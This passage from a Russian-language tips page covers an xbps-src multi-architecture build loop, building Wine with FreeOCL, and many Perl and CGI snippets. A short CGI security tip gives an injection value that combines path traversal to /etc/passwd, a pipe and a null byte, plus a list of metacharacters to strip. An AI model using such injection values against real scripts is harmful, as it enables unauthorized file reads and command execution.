1.0.tar.gz"; "make check" можете исключить, но с ним интереснее. Шаг 4, последний. Собираем. На выбор есть много платформ/архитектур, вот их список: x86_64-musl aarch64-musl aarch64 armv5tel-musl armv5tel armv5te-musl armv5te armv6hf-musl armv6hf armv6l-musl armv6l armv7hf-musl armv7hf armv7l-musl armv7l i686-musl i686 mipselhf-musl mipsel-musl mipshf-musl mips-musl ppc64le-musl ppc64le ppc64-musl ppc64 ppcle-musl ppcle ppc-musl ppc. Впечатляет? Собираем так: $ ./xbps-src -a armv7hf-musl -C pkg helloworld Вместо armv7hf-musl подставляете нужную платформу из списка. В процессе xbps-src сам доставит отсутствующий тулчейн и сам запустит сборку. Берите пиво, колу, чай (что вы пьете) и наблюдайте логи. Лично я делаю скриптом: for arch in x86_64-musl \\ aarch64-musl aarch64 \\ armv5tel-musl armv5tel armv5te-musl armv5te armv6hf-musl armv6hf armv6l-musl armv6l armv7hf-musl armv7hf armv7l-musl armv7l \\ i686-musl i686 \\ mipselhf-musl mipsel-musl mipshf-musl mips-musl \\ ppc64le-musl ppc64le ppc64-musl ppc64 \\ ppcle-musl ppcle \\ ppc-musl ppc do ./xbps-src -a $arch clean helloworld ./xbps-src -a $arch -C pkg helloworld || exit $? done Пока все. Автоматическое тестирование всех этих платформ/архитектур не вставая с кресла и не создавая сорок виртуалок будет в следующем совете - https://www.opennet.dev/tips/3201_helloworld_build_compile_libc_musl.shtml

Компиляция приложений с поддержкой OpenCL без закрытых драйверов Автор: Аноним [комментарии]

При сборке Wine не для личного использования, а чтобы распространять сборки, я столкнулся с проблемой. С какой реализацией OpenCL линковать? NVIDIA, AMD, Intel, Mesa? Ответ - FreeOCL! На самом деле, не важно с чем линковать. У всех известных мне реализаций OpenCL, сама библиотека libOpenCL.so.1 занимает около 30 Кб. Оказывается, внутри этой библиотеки ничего нет. Сам OpenCL находится в другой библиотеке (например в libatiocl64.so - см. /etc/OpenCL/vendors/*.icd для подробностей). Однако залить проприетарный драйвер в OBS-репозиторий я не могу, так как закрытый код. Остаётся только Mesa и FreeOCL. FreeOCL это программная реализация OpenCL, написанная на C++, и имеющая у себя в зависимостях libatomic_ops - а LLVM не имеющая. Установив в систему FreeOCL и opencl-headers, я успешно собрал Wine. Причём Wine линкуется только с OPENCL_1.0, что не помешало конечному софту, запущенному в Wine, успешно задействовать расширения 1.2 и 2.0. В общем, рекомендую всем, кто до сих пор собирает с AMD APP SDK 3.0, перейти на FreeOCL. Я попробовал скомпилировать весь известный мне OpenCL-софт при помощи FreeOCL, а затем запустить на NVIDIA и AMD - всё работает безупречно. Не падает, не отказывается стартовать, и демонстрирует ровно ту же скорость работы. P.S. Бинарник получает зависимость от libOpenCL.so.1 (параметр -lOpenCL), а пакет RPM или DEB также получает от pkg-config ещё несколько зависимостей: libOpenCL.so.1(OPENCL_1.0)(64bit) libOpenCL.so.1(OPENCL_1.1)(64bit) libOpenCL.so.1(OPENCL_1.2)(64bit) libOpenCL.so.1(OPENCL_2.0)(64bit) Поэтому если вы собираете пакеты, а не просто tar.gz архив с программой, рекомендую пропатчить FreeOCL патчем freeocl-0.3.6-disable-symbol-versioning.patch. В этом случае, пакет получит зависимость только от libOpenCL.so.1()(64bit). Например в моей системе в пакете NVIDIA 340.xx нет "версионинга" OpenCL, а в 390.xx он есть. Вследствие чего, пакет не хотел устанавливаться, но после force install - работал.

Perl

CGI

Regex (регулярные выражения)

Массивы и Хэши

Отладка программ на Perl

Переменные в Perl

Полезные подпрограммы на Perl

Обработка изображений на Perl

Подпрограммы для WEB

Работа с сетью и IP адресами на Perl

Работа со временем и датами

Работа с файлами

Работа с электронной почтой

Функции и модули в Perl

10 полезных опций для написания однострочников на языке Perl (доп. ссылка 1) [комментарии]

В простейших случаях perl можно использовать в командной строке как замену grep и sed, например: perl -ne 'print if /foo/' perl -pe 's/foo/bar/' Но существует ряд интересных особенностей, которые часто упускаются из виду: Опция "-l" При добавлении опции "-l" perl автоматически очищает символ перевода строки перед обработкой в скрипте и добавляет его при каждом выводе данных. Например, для очистки завершающих каждую строку файла пробелов можно использовать: perl -lpe 's/\s*$//' (если указать perl -pe 's/\s*$//', то будут удалены и символы перевода строки) Опция "-0" По умолчанию perl разбивает входящий поток на строки, обрабатывая каждую строку отдельно. Опция "-0" позволяет выполнить операцию над файлом целиком, без разбиения на строки по символу перевода строки, а с разбиением на блоки по нулевому символу (так как в текстовых файлах \0 не встречается можно использовать -0 для обработки всего файла разом). Например, для удаления из текущей директории всех файлов, имена которых начинаются с тильды, можно использовать: find . -name '*~' -print0 | perl -0ne unlink Опция "-i" При указании "-i" perl считывает поток данных из указанного в командной строке файла, а затем записывает в него же результат работы, заменяя его. В качестве аргумента можно указать расширение для создания резервной копии файла. Например для удаления всех комментариев в скрипте script.sh можно использовать: perl -i.bak -ne 'print unless /^#/' script.sh На случай ошибки, старая версия файла будет сохранена в script.sh.bak. Оператор ".." Для оперировании с диапазоном строк необходимо учитывать состояние прошлых вычислений, для чего можно использовать оператор "..". Например, для раздельной выборки всех GPG-ключей из одного файла, выводя только данные, идущие между указанным заголовком и футером, можно использовать: perl -ne 'print if /-----BEGIN PGP PUBLIC KEY BLOCK-----/../-----END PGP PUBLIC KEY BLOCK-----/' FILE Опция "-a" При указании опции "-a" perl автоматически разбивает каждую строку на части, по умолчанию используя пробел в качестве разделителя, и помещает ее элементы в массив @F. Например, для вывода 8 и 2 столбца можно использовать: ls -l | perl -lane 'print "$F[7] $F[1]"' Опция "-F" Опция "-F" позволяет указать символ разделителя для разбиения строки при использовании опции "-a". Например, для разбиения не по пробелу, а по двоеточию, нужно указать: perl -F: -lane 'print $F[0]' /etc/passwd Оператор "\K" При указании "\K" внутри регулярного выражения, можно отбросить все ранее найденные совпадения, что позволяет упростить операции по замене данных без задействования переменных. Например, для замены поля "From:" в тексте email можно использовать: perl -lape 's/(^From:).*/$1 Nelson Elhage <nelhage\@ksplice.com>/' Который можно свести к perl -lape 's/^From:\K.*/ Nelson Elhage <nelhage\@ksplice.com>/' уточнив, что мы не хотим заменять начало строки. Хэш %ENV К любой переменной системного окружения можно получить доступ через хэш %ENV, что можно использовать для выполнения операций с одинарными кавычками, использованию которых мешают проблемы с экранированием данного символа в shell. Для задачи вывода имен пользователей, содержащих апостроф можно использовать: perl -F: -lane 'print $F[0] if $F[4] =~ /'"'"'/' /etc/passwd но считать кавычки задача неприятная, поэтому данную строку можно свести к: env re="'" perl -F: -lane 'print $F[0] if $F[4] =~ /$ENV{re}/' /etc/passwd Конструкции "BEGIN" и "END" Блоки BEGIN { ... } и END { ... } позволяют организовать выполнение кода до и после цикличной обработки строк файла. Например, для подсчета суммы второго столбца в CSV файле можно использовать: perl -F, -lane '$t += $F[1]; END { print $t }' Опция "-MRegexp::Common" Через указание опции "-M" можно загрузить любой дополнительный perl-модуль. В однострочных скриптах удобно использовать модуль Regexp::Common, содержащий коллекцию типовых регулярных выражений для обработки различных видов данных. Например, для разбора вывода команды ifconfig можно использовать готовые маски для определения IP-адресов: ip address list eth0 | \ perl -MRegexp::Common -lne 'print $1 if /($RE{net}{IPv4})/'

Замена установленного вручную perl-модуля на версию из пакета (доп. ссылка 1) [комментарии]

Иногда требуется заменить ранее вручную установленный perl-модуль на его вариант, появившийся в составе дистрибутива (Ubuntu/Debian). Для удаления установленного вручную модуля можно использовать скрипт: #!/usr/bin/perl -w use ExtUtils::Packlist; use ExtUtils::Installed; $ARGV[0] or die "Usage: $0 Module::Name\n"; my $mod = $ARGV[0]; my $inst = ExtUtils::Installed->new(); foreach my $item (sort($inst->files($mod))) { print "removing $item\n"; unlink $item; } my $packfile = $inst->packlist($mod)->packlist_file(); print "removing $packfile\n"; unlink $packfile; Запускаем скрипт для удаления, например, модуля XML::SAX: # chmod u+x rm_perl_mod.pl # ./rm_perl_mod.pl XML::SAX Устанавливаем вариант модуля из пакетов: # apt-get install libxml-sax-expat-perl

Как в Debian/Ubuntu установить отсутствующий в репозитории Perl модуль [комментарии]

В случае отсутствия определенного Perl модуля в стандартных репозиториях Debian и Ubuntu, можно поставить модуль через задействования механизмов установки модулей CPAN, но такие модули не впишутся в пакетную инфраструктуру дистрибутива. Поэтому для установки нестандартных Perl модулей следует использовать dh-make-perl. Ставим пакет dh-make-perl: apt-get install dh-make-perl Устанавливаем нужный Perl модуль (в примере Module::Name) из репозитория CPAN: dh-make-perl --cpan Module::Name --install Например: dh-make-perl --cpan HTML::CTPP2 --install Утилита dh-make-perl сама загрузит нужный модуль, соберет его, оформит deb-пакет и установит его. Если модуль не из CPAN, можно распаковать модуль и выполнить (--build - сформировать пакет, но не устанавливать): dh-make-perl директория_с_модулем --build

Как выделить цветом определенное слово, используя "tail -f" (доп. ссылка 1) [комментарии]

Пример, выделения слова Reject при просмотре хвоста почтового лога: tail -f /var/log/maillog |perl -p -e 's/Reject/\033\[46;1mReject\033[0m/gi;' Если нужно не только выделять цветом, но и подавать звуковой сигнал при появлении test@test.ru: tail -f /var/log/maillog |perl -p -e 's/(test\@test.ru)/\033\[46;1m$1\033[0m\007/gi;'

Кратко о безопасности в CGI скриптах на Perl [комментарии]

- Главное правило - всегда явно проверять все переменные полученные из внешних источников (cgi-параметры, cookie, переменные окружения, имя файла и путь (при листинге директории по readdir)); - Вырезать спецсимволы в переменных используемых в сис. функциях (open(), system(), ``) и обращениях к sql. вырезание: s/[^\w\d_\-.]//g или tr/;<>*|?`&$!#{}[]:'\/\n\r\0// для open(), system(), ``. не забывать про \0 (передают %00, который воспринимается как конец стоки) Пример: $var="../../etc/passwd|\0"; open(F, "/home/test/$var.txt") - при открытии файла на чтение в open() всегда указывать "<$file"; - Осторожность при использовании переменной внутри eval() и regex (/\Q$var\E/ иначе можно подставить ?{код}). - Нельзя проверять числовые параметры через "if ($var > 0)", так как может пройти $var="123;somecode";

Как ограничить время выполнения Perl блока таймаутом [комментарии]

use constant TIMEOUT => 1; eval { local $SIG{ALRM} = sub { die "timeout during sysread\n"; }; alarm(TIMEOUT); $read_flag = sysread($filehandle, $c, 1); alarm(0); };

Как отключить буферизацию вывода в Perl [обсудить]

$|=1;

Как писать многострочные комментарии [обсудить]

код =comment Текст Комментария =cut код

Как просмотреть руководство по конкретной perl функции [обсудить]

perldoc -f имя_функции perldoc -q слово_в_faq

Генерация выполняемого perl файла из core [обсудить]

1. $ /usr/bin/perl -u myprog.pl $ undump myprog /usr/bin/perl core 2. $ perl -MO=Bytecompile,-ofile sourcescript undump - http://ftp.ktug.or.kr/tex-archive/support/undump/

Как скомпилировать Perl скрипт в бинарный вид, чтобы другие не смогли увидеть исходный текст. [обсудить]

perlcc script.pl Подробнее, man perlcc Если perlcc выдаст ошибку, что невозможно найти DynaLoader.a, впишите в начало компилируемого файла "use DynaLoader;". Метод 2: В байткод: perl -MO=Bytecode,-H,-o out_file.bin in_file.pl В исполняемый файл (с промежуточной генерацией кода на Си) perl -MO=C,-ofoo.c foo.pl perl cc_harness -o foo foo.c или perl -MO=C,-v,-DcA,-l2048 bar.pl > /dev/null или perl -MO=CC,-O2,-ofoo.c foo.pl perl cc_harness -o foo foo.c или perl -MO=CC,-mFoo,-oFoo.c Foo.pm perl cc_harness -shared -c -o Foo.so Foo.c Также см. проект PAR http://par.perl.org/

CGI

Какую простейшую защиту от сабмита формы поисковым или спам-роботом можно предпринять. [комментарии]

В связи с участившимися случаями появления web-роботов занимающихся сабмитом форм, рекомендую: if ( ($ENV{"HTTP_REFERER"} !~ /sitename\.ru/i) || ($ENV{"HTTP_USER_AGENT"} !~ /(netscape|mozilla|links|lynx|opera|msie|konqueror)/i) ){ die "Несанкционированный запрос !"; }

В чем могут быть причины не выставления Cookie из скрипта. (доп. ссылка 1) [обсудить]

1. Ограничение на максимально возможное число кук или размер куки, у каждого браузера свой предел (лучше не больше 20). 2. Ошибка в указании (или не указание) времени жизни Cookie. 3. В параметрах указан неправильный domain (например не текущий). 4. Запуск .cgi скрипта не напрямую, а через SSI (из .shtml), соответственно cookie в заголовке воспринята не будет, выставлять нужно используя JavaScript.

Как считать список установленных cookies в хеш. [обсудить]

sub load_cookies{ local (*cook_arr) = @_; foreach (split(/\;\s*/,$ENV{'HTTP_COOKIE'})){ my ($cur_key, $cur_val) = split(/\=/); $cook_arr{"$cur_key"} = $cur_val; } } load_cookies(*cooks); print $cooks{"cook_name"};

Заметка по установке хэдеров из cgi Автор: Yuri A. Kabaenkov [обсудить]

При установки хэдера из cgi (Location,Content-Type, etc) многие пишут (print "Location: http://test.com\n\n";), но данную запись(\n\n) могут не понять некоторые системы типа Mac и т.д. Правильней отправлять хэдер как: print "Location: http://test.com\r\n\r\n"; Обратите внимание на (\r\n\r\n)

Как в SSI передать параметры скрипту используя метод POST [комментарии]

 Для метода GET: 

Еще один способ отладки CGI скриптов на перле Автор: Vovik Alyekhin [обсудить]

use CGI::Debug; Брать соответственно на cpan-е

Как добится показа русских букв в JavaScript (перекодировка в UTF) [обсудить]

Для показа русских букв в JavaScript блоке нужно перекодировать их в UTF: sub koi2utf{ my($str)=@_; $_=$str; s/ё/ё/g; s/Ё/Ё/g; s/ю/ю/g; s/а/а/g; s/б/б/g; s/ц/ц/g; s/д/д/g; s/е/е/g; s/ф/ф/g; s/г/г/g; s/х/х/g; s/и/и/g; s/й/й/g; s/к/к/g; s/л/л/g; s/м/м/g; s/н/н/g; s/о/о/g; s/п/п/g; s/я/я/g; s/р/р/g; s/с/с/g; s/т/т/g; s/у/у/g; s/ж/ж/g; s/в/в/g; s/ь/ь/g; s/ы/ы/g; s/з/з/g; s/ш/ш/g; s/э/э/g; s/щ/щ/g; s/ч/ч/g; s/ъ/ъ/g; s/Ю/Ю/g; s/А/А/g; s/Б/Б/g; s/Ц/Ц/g; s/Д/Д/g; s/Е/Е/g; s/Ф/Ф/g; s/Г/Г/g; s/Х/Х/g; s/И/И/g; s/Й/Й/g; s/К/К/g; s/Л/Л/g; s/М/М/g; s/Н/Н/g; s/О/О/g; s/П/П/g; s/Я/Я/g; s/Р/Р/g; s/С/С/g; s/Т/Т/g; s/У/У/g; s/Ж/Ж/g; s/В/В/g; s/Ь/Ь/g; s/Ы/Ы/g; s/З/З/g; s/Ш/Ш/g; s/Э/Э/g; s/Щ/Щ/g; s/Ч/Ч/g; s/Ъ/Ъ/g; return $_; }

Что использовать для отладки CGI если нет доступа к логам сервера [обсудить]

use CGI::Carp qw (fatalsToBrowser);

Как закодировать и раскодировать строку %XX в URL. [комментарии]

Закодировать: $toencode =~ s/([^a-zA-Z0-9_.-])/uc sprintf("%%%02x",ord($1))/eg; Раскодировать: $todecode =~ s/%(..)/pack("c",hex($1))/ge;

Regex (регулярные выражения)

Как в Perl скрипте сосчитать число совпадений в regex. [комментарии]

$numbers = () = ($src_string =~ m/\d+/g);

Как в perl regex обнаружить несколько одинаковых, подряд идущих, символов. [обсудить]

my $a="ttttest"; # Нужно определить 4 подряд идущих символа if ($a =~ /([a-z])\1{3}/ ){ print "4 совпало.\n"; } где, \1 - обратная ссылка на совпадение в скобках, {3} - повтор 3 раза.

Как при использовании переменной в regex запретить интерпретацию спец. символов. [обсудить]

Нужно поместить переменную между "\Q" и "\E": $var =~ m/\Q$mask\E/; Можно отдельно вызвать функцию для экранирования: $var = quotemeta($var);

Как в Perl вызывать функции внутри regex. [обсудить]

Пример замены первой буквы в строке с нижнего регистра на верхний: $a =~ s/^(\w)(.*)$/uc($1).$2/e;

Как используя Perl разбить число на триады Автор: gr [обсудить]

$num = 100000000000000; $num =~ s/(\d{1,3}(?=(?:\d\d\d)+(?!\d)))/$1,/g;

Как в Perl вырезать у строки лидирующие пробелы [комментарии]

$str =~ s/^\s*([^\s]?.*)$/$1/; $str =~ s/^(.*[^\s])\s*$/$1/; # два regex работают быстрее, чем один более сложный

Как закодировать и раскодировать строку %XX в URL. [комментарии]

Закодировать: $toencode =~ s/([^a-zA-Z0-9_.-])/uc sprintf("%%%02x",ord($1))/eg; Раскодировать: $todecode =~ s/%(..)/pack("c",hex($1))/ge;

Массивы и Хэши

Как организовать выборку ключа по условию больше или равно в BerkeleyDB [обсудить]

Задача: выбрать запись с ключем большим или равным искомому, т.е. организовать выборку по промежутку значений: #!/usr/bin/perl use strict; use BerkeleyDB; use constant DB_DEF_CACHE_SIZE => 5000000; my %hash; my $dbobj = tie(%hash, 'BerkeleyDB::Btree', -Filename => "test.db", -Cachesize => DB_DEF_CACHE_SIZE, -Flags => DB_CREATE, -Compare => sub { $_[0] <=> $_[1] } ) or die "Can't create or open DB File!\n"; # Тестовые значения $hash{5}="0-5"; $hash{8}="6-8"; $hash{20}="9-20"; $hash{80}="21-80"; my ($key, $val); my $cursor = $dbobj->db_cursor(); # Выборка. $key=3; $cursor->c_get($key, $val, DB_SET_RANGE); print "3=$val\n"; $key=25; $cursor->c_get($key, $val, DB_SET_RANGE); print "25=$val\n"; $key=80; $cursor->c_get($key, $val, DB_SET_RANGE); print "80=$val\n"; untie %hash;

Как получить бинарный дамп хеша или массива на Perl [обсудить]

use Storable; Запись/чтение дампа в файл. store (\%table, 'file'); $hashref = retrieve('file'); lock_store (\%table, 'file'); $hashref = lock_retrieve('file'); Запись/чтение дампа в ранее открытый файл. store_fd (\%table, \*FILE); $hashref = fd_retrieve(\*FILE); Запись/чтение дампа в скалярную переменную (удобно для использования для привязки сложной структуры к ключу в DB_File или BerkeleyDB). $hash_dump = freeze (\%table); $hash_ref = thaw($hash_dump); Если нужно получить дамп в символьном "perl sources"-виде для использования в eval или print: use Data::Dumper;

Как сразу выделить память под хэш в Perl до его заполнения. [комментарии]

Определяем, что хэш будет содержать около 100 записей: keys( %hash ) = 100;

Обращение к DB файлам в Perl как к хэшам. [обсудить]

use DB_File; $db_hashinfo = new DB_File::HASHINFO; $db_hashinfo->{'cachesize'} = 100000; $dbobj = tie(%hash, "DB_File", "somefile.db", O_RDWR|O_CREAT, 0644, $db_hashinfo ))||die "Error"; $dbobj->del($key); $dbobj->sync(); untie %hash; Для доступа к хранилищам Berkeley DB версии 2,3 и 4 нужно использовать модуль BerkeleyDB.

Как вывести содержимое хеша с сортировкой по ключу или данным. [обсудить]

Сортировка по ключу: foreach $key (sort keys %hash){ } Сортировка по данным сопоставленым с ключом: foreach $key (sort { $hash{$a} cmp $hash{$b} } keys %hash){ } Если сортировка осуществляется над строковыми данными используем "cmp", если над цифровыми - "<=>". Для сортировки в обратном порядке пишем "reverse sort".

Как организовать хэш элементами которого являются хэши (хэш хэшей) [комментарии]

%a=( "test1" => { "TITLE" => "incoming", "HEADER" => "Hi" }, "test2" => { "TITLE" => "outgoing" } ) $s = $a{"test1"}{"TITLE"}; print "$s\n";

Как организовать массив элементами которого являются массивы [обсудить]

@a=(["a","b","c"],["d","e"],["f"]); foreach $b (@a){ foreach $c (@$b){ print "$c\n"; } print "====\n"; } $z=$a[1][1]; print "--$z\n";

Как узнать число элементов массива [комментарии]

@array=(); $n = $#array; # это номер последнего индекса, число записей - scalar @array; Если $n = -1 - то массив пустой, если $n = 0 - в массиве 1 элемент и т.д.

Как в качестве значения в ассоциацтивном массиве использовать обычный массив. [обсудить]

%ass=( "login" => ["test", 32, 2]); Для доступа к элементам массива используем: @{$ass{"login"}}[0]; # test @{$ass{"login"}}[1]; # 32 @{$ass{"login"}}[2]; # 2

Как в Perl получить элемента массива имя которого находится в переменной [обсудить]

Реальный массив: %form_test = ('a' => 1); Переменаня $name="test"; Генерируем ссылку на массив: $tmp = eval "\\\%form_$name"; Вычилсяем хначение элемента массива: $key_val = $$tmp{"a"};

Отладка программ на Perl

Как отследить время выполнения различных участков Perl программы ? [обсудить]

perldoc Devel::DProf Запускаем программу как perl -d:DProf prog.pl Затем смотрим в сгенерированный файл tmon.out, или используем специальную программу для его разбора, например dprofpp -T

Как протестировать производительность (скорость выполнения) perl скрипта. [обсудить]

use Benchmark; $string = "The bitter end.\n"; $code{"chomp"} = 'chomp $string'; $code{"regex"} = '$string =~ s/\n$//'; timethese(10_000_000, \%code); или timethese($count, { 'test1' => sub { foreach $cur_val (@arr){....}}, 'test2' => sub { ....много кода... }, });

Переменные в Perl

Автоматизация объявления переменных в Perl при использовании strict (доп. ссылка 1) Автор: Sokolov Alexey [комментарии]

Мне требовалось переписать мой же проект, написанный на Perl, с использованием "use strict". Было лень объявлять все переменные вручную, т.к. их было чертовски много, посему я решил сей процесс автоматизировать. Это конечно не совсем правильно, однако я всё равно весь результат потом тщательно проанализировал. Итак, предлагаю вашему вниманию мой метод автоматизации: 1. Включаем в скрипте режим strict: use strict; 2. Запускаем наш скрипт и фильтруем вывод ошибок на наличие "Global symbol", записывая в отдельный файл (например, var.txt): perl -c script.pl 2>&1 | grep "Global symbol" > var.txt 3. Отсортируем дубликаты, оставив только первое вхождение переменной: cat var.txt| sort -k 3| uniq -w 60| sort -nk 11| less 4. Получившийся вариант анализируем мозгами и вставляем в код скрипта необходимые операторы "my". Проверяем каждую переменную на необходимость дополнительного переопределения в локальных блоках и функциях. Настоятельная рекомендация: пишите скрипты на Perl сразу с использованием strict и warnings.

Пример использования Tie для ассоциирования функции с хешем. Автор: lw [обсудить]

use Tie::Sub; tie my %sub, 'Tie::Sub', sub{sprintf '%04d', shift}; print "See $sub{4} digits.";

Как узнать тип ссылочной переменной в Perl [комментарии]

Иногда нужно узнать на массив, хэш или скаляр указывает ссылка. ref возвращает строковый идентификатор типа ссылки (SCALAR, ARRAY, HASH, CODE, REF, GLOB, LVALUE) или пустое значение для обычных переменных. Например: if (ref($r) eq "HASH") { print "Хэш\n"; } elsif (ref($r) eq "ARRAY"){ print "Массив\n"; }

Манипулирование файловыми хэндлерами в Perl (доп. ссылка 1) [обсудить]

Пример хранение дескрипторов в хэше: my %user_fd = (); if (! defined $user_fd{$cur_login}){ open($user_fd{$cur_login}, ">$cur_file") or return -1; } print {$user_fd{$cur_login}} "TEST\n"; close($user_fd{$cur_login}); Пример передачи дескриптора из функции: # Для perl 5.6 и старше open (my $fh, $file_name); print $fh "Hello World!\n"; process_file( $fh ); open (FILE, "> $filename)"; process_typeglob( *FILE ); process_reference( \*FILE ); sub process_typeglob { local *FH = shift; print FH "Typeglob!" } sub process_reference { local $fh = shift; print $fh "Reference!" } my $fh = myopen("file_path"); while (<$fh>) { .... } close $fh; sub myopen { my $path = shift; local *FH; open (FH, $path) || return undef; return *FH; }

Как в Perl оптимально заменить символы в строке или разбить строку на части [комментарии]

При работе с большими строками нужно избегать внутреннего копирования строк, которое происходит при использоании регулярных выражений или оператора split. Для разбиеная строки вида "small_begin:big_end" на две подстроки используем: my $pos=index($str, ':'); my $begin_str = substr($str, 0, $pos,""); # в $str остается только big_end часть, в $begin_str - "small_begin:" Соответсвенно, для замены символов удобно использовать: substr(строка, начало замены, число заменяемых символов, блок на который заменяем);

Как вывести шестнадцатеричный код символа на Perl [обсудить]

$ch="M"; print sprintf("%2x", ord($ch));

Как написать обработчик сигнала на Perl [обсудить]

sub pipe_sig{ return 0; }; $SIG{'PIPE'} = \&pipe_sig;

Как определить число в переменной или строка [обсудить]

if (( ~$scalar & $scalar ) eq '0' ){ число }

Как определить константу в Perl [комментарии]

use constant TEST => 1; $a=TEST;

Полезные подпрограммы на Perl

Обработка изображений на Perl

Подпрограммы для WEB

Работа с сетью и IP адресами на Perl

Perl функция для quoted-printable кодирования в соответствии с RFC2047 (доп. ссылка 1) Автор: dev [комментарии]

Популярный Perl модуль MIME::Words не обеспечивает quoted-printable кодирование в полном соотвтетвии с RFC2047 (пробелы между двумя закодированными блоками недопустимы). # rfc2047conv (строка, кодировка, размер префикса); sub rfc2047conv{ my $str = shift; # чего кодировать my $charset = uc(shift); # какую кодировку приписать my $init_len = shift || 0; # длина того, что планируется добавить потом в начало строки my $len = length($str); return '' unless($len); my $begin = "=?$charset?Q?"; my $res = $begin; my $count = $init_len + length($begin); foreach my $c (split(//, $str)) { my ($repl, $repl_len); if($c eq '?' || $c eq '_' || $c eq '=' || $c lt ' ' || $c gt '~') { $repl = sprintf("=%X", ord($c)); $repl_len = 3; } elsif($c eq ' ') { $repl = '_'; $repl_len = 1; } else { $repl = $c; $repl_len = 1; } if($count + $repl_len > 72) { $res .= "?=\r\n " . $begin; $count = 1 + length($begin); } $res .= $repl; $count += $repl_len; } $res .= '?='; return $res; } printf("[%s]\n", rfc2047conv("проверка ", 'KOI8-R', length('Subject: ')));

Обработка иерархически связанной структуры на Perl на perl. Автор: Andrey Karavaev [комментарии]

Как-то пришлось столкнуться с обработкой иерархически связанной структуры на perl. В инете есть куча разрозненной информации по этому поводу. Можно, например, воспользоваться пакетами с сайта CPAN. Но с одной стороны стрелять из пушки по воробьям ... не дело.. а с другой надо чтобы и в мозгах что-то осталось. Вообщем, задачка решилась и заодно родился вот такой скриптик, не претендующий на уникальность, тем более, что на perl (как и на других мощных языках) одну и ту же задачу можно решить многими способами. Хотя, эффективность этих способов - это уже другой вопрос. Итак, скрипт. #!/usr/bin/perl # Рассмотрим принцип работы рекурсивных функций и построения # связанных структур (в данном случае анонимных хэшей) на # примере скрипта для иерархического (в виде дерева) # отображения подкаталогов, содержашихся в заданном каталоге. # # Сначала необходимо провернуть некоторые подготовительные # операции. Например, определиться какой каталог будем печатать. print "Directory to print [.]: "; # Считываем каталог и удаляем символ конца строки. chop (my $d = <>); # По умолчанию берем текущий каталог. if (!$d) {$d="."}; # Проверяем, является ли $d каталогом...? (-d $d) or die "Error: $d isn\'t directory.\n"; # Теперь создаем дерево вложенных хэшей с помощью # функции MakeTree, которая возвращает указатель # на корневой хэш. my $root = MakeTree($d); # И печатаем. Первый параметр - уровень вложенности # текущего каталога - $d. PrintTree(0,$root); # Рассмотрим подробнее рекурсивные функции MakeTree и PrintTree sub MakeTree { # Берем первый параметр - каталог для обработки my $path_to_dir = shift; # Инициализируем хэш, в котором будем сохранять # результат обработки каталога $path_to_dir. my %branches; # Читаем содержимое каталога в массив @content. # Причем выбрасываем из рассмотрения каталоги # "." (текущий), ".." (уровнем выше) и файлы. opendir DIR, $path_to_dir; my @content = grep { !/^\.{1,2}$/ && !(-f $path_to_dir."/".$_) } readdir DIR; closedir DIR; # В итоге в @content содержится список каталогов, # находящихся в $path_to_dir. Теперь для каждого foreach my $dir (@content) { # каталога из этого списка рекурсивно запускаем # эту же функцию - MakeTree, в аргументе которой # уже новый путь - путь к каталогу $dir. $branches{$dir} = MakeTree($path_to_dir."/".$dir); # В результате в хэш %branches по ключу $dir заносится # значение, возвращаемое функцией MakeTree. А это значение } # ничто иное, как указатель на хэш, поскольку функция # MakeTree возврашает указатель на хэш %branches, как мы # видим ниже. Ключи этого хэша - каталоги, содержащиеся # в $dir, а значения по этим ключам - опять же указатели на #хэши...и т.д. return \%branches; # Но ведь %branches обьявлен с ключевым словом my и ограничен # областью видимости функции (в данном случае)?!..Это означает, # что сборщик мусора perl должен уничтожить %branches при # выходе из функции. Оказывается, нет. Дело в том, что пока для # переменной (в данном случае - хэш), объявленной с оператором # my внутри блока { } существует указатель вне этого блока, то # perl не уничтожает переменную, и мы приходим к понятию # анонимная переменная (хэш). Т.е. мы обращаемся к переменной # не $имя_переменной, а через указатель. } # Таким образом, в результате создаются ссылающиеся друг # на друга анонимные хэши, которые существуют до тех пор, # пока существует указатель $root. # Печатаем результат. sub PrintTree { # Первый параметр - уровень вложенности каталога. my $level = shift; # Второй - хэш, содержащий имена каталогов, через указатель. my %top = %{(shift)}; # Далее для каждого ключа из хэша %top foreach $key (keys %top) { # печатаем сам ключ (на самом деле ключ - имя каталога), # причем с отступом 4*$level. printf ("%${\(4*$level)}s$key\n","|"); # Необходимо заметить, что в %top по ключу $key содержится # хэш с именами каталогов, которые тоже было бы неплохо # распечатать. Поэтому увеличиваем уровень вложенности $level++; # и опять вызываем PrintTree. PrintTree($level,$top{$key}); # После чего надо вернуть уровень вложенности на место. $level--; } }

Как создать лок файл на Perl [комментарии]

Для защиты от одновременного запуска нескольких процессов, можно сделать так: use Fcntl qw(:flock :DEFAULT); my $cfg_glob_lock="/var/run/myprog/test.pid"; # Проверяем лок. if (-f $cfg_glob_lock){ # Лок присутствует. Проверяем не дохлый ли процесс. my $lock_pid = 0; open(LOCK,"<$cfg_glob_lock"); # Если удалось заблокировать, значит процесс мертв. my $zombie_lock_flag = flock(LOCK, LOCK_EX|LOCK_NB); $lock_pid = <LOCK>; close (LOCK); chomp ($lock_pid); if ($lock_pid > 0 && $zombie_lock_flag == 0){ # Реакция на зависший процесс. die "Proccess locked (pid=$lock_pid)"; } else { # Лок от мертвого процесса. unlink("$cfg_glob_lock"); warn("DeadLock detected ($lock_pid)"); } } # Записываем pid в новый лок файл. sysopen(LOCK, $cfg_glob_lock, O_CREAT|O_EXCL|O_WRONLY) or die 'Race condition'; print LOCK "$$\n"; close(LOCK); # Открываем лок. open(GLOB_LOCK,"<$cfg_glob_lock"); flock(GLOB_LOCK, LOCK_EX); .... рабочий код скрипта # Закрываем и удаляем лок flock(GLOB_LOCK, LOCK_UN); close(GLOB_LOCK); unlink("$cfg_glob_lock");

Преобразование текста из UTF-8 в KOI8-R и обратно на языке Perl [комментарии]

Преобразование из UTF-8 в KOI8-R: use Unicode::Map8; use Unicode::String qw(utf8); my $koi8 = Unicode::Map8->new("koi8-r"); $koi8_string = $koi8->to8(utf8($utf8_string)->utf16); Обратное преобразование use Unicode::Map8; use Unicode::String qw(utf16); my $koi8 = Unicode::Map8->new("koi8-r"); $utf8_string = utf16($koi8->to16($koi8_string ))->utf8; Другой метод: use Encode; $koi8_text = from_to($utf8_text, "utf8", "koi8-r"); $utf8_text = from_to($koi8_text, "koi8-r", "utf8");

Симметричное шифрование блока данных на Perl. [комментарии]

